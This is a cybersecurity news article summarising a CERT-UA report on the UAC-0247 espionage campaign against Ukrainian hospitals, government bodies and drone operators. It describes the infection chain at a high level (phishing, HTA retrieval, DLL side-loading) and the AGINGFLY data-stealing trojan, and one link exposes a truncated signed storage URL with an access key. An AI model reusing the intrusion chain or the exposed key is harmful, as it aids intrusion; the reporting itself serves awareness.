UAC-0247 Attacks Hospitals, Governments to Steal Browser, WhatsApp Data
Key Takeaways The threat group UAC-0247 has been observed since early 2026, targeting government entities and hospitals, as well as Ukrainian defense personnel. The attackers employ sophisticated...
Key Takeaways
- The threat group UAC-0247 has been observed since early 2026, targeting government entities and hospitals, as well as Ukrainian defense personnel.
- The attackers employ sophisticated spear-phishing tactics, often leveraging themes of humanitarian aid or software updates, to deliver malware.
- The primary objective is the exfiltration of sensitive data from web browsers and WhatsApp, alongside extensive network reconnaissance.
- A key component of their arsenal is the AGINGFLY remote access trojan, which dynamically compiles command handlers on infected systems.
UAC-0247 Targets Critical Sectors with Advanced Data Theft Campaign
A persistent threat cluster, identified as UAC-0247, has been actively engaged in cyber espionage since early 2026, according to a detailed report. This group has systematically targeted critical infrastructure, including government agencies and hospitals, with a focus on stealing sensitive data from internet browsers and WhatsApp applications. Beyond data exfiltration, UAC-0247 demonstrates a capability for lateral movement and network expansion within compromised environments, as documented in a comprehensive analysis here.
Table Of Content
Initial Infiltration Tactics
The campaign typically initiates with highly deceptive spear-phishing emails. These messages are crafted to appear as discussions about humanitarian aid, urging recipients to click on a malicious link. To enhance credibility, attackers either construct convincing fake websites using AI tools or redirect victims to legitimate third-party sites hosting Cross-Site Scripting (XSS) vulnerabilities. Upon clicking the link, a malicious archive file is downloaded to the target’s system. Opening this archive executes a shortcut file, which then leverages the standard HTA file processing utility to retrieve and run a remote HTA file. This process often includes a decoy form to distract the user while, in the background, an executable file is dropped and launched via a scheduled task. Further details on this mechanism are available here.
Analysts at CERT-UA have extensively documented this activity, noting a surge in attacks during March and April 2026. The same group has also broadened its scope to include Ukrainian Defense Forces personnel and FPV drone operators. A notable incident on March 10, 2026, involved the distribution of “bachu.zip” via the Signal messenger, masquerading as an update for the “BACHU” software used by FPV operators. This archive contained a DLL file designed to launch the AGINGFLY malware through a DLL side-loading technique upon execution of the primary program. More information can be found in the linked report <a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/afd78249-0a3f-48c9-b1f7-e4105adec086/New-UAC-0247-Campaign-Steals-Browser-and-WhatsApp-Data-From-Hospitals-and-Governments.pdf?AWSAccessKeyId=ASIA2F3EMEYE2XIWZKIP&Signature=ZB%2B8Q6XD1aSvrlil0XjbtFJhNs%3D&x-amz-
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.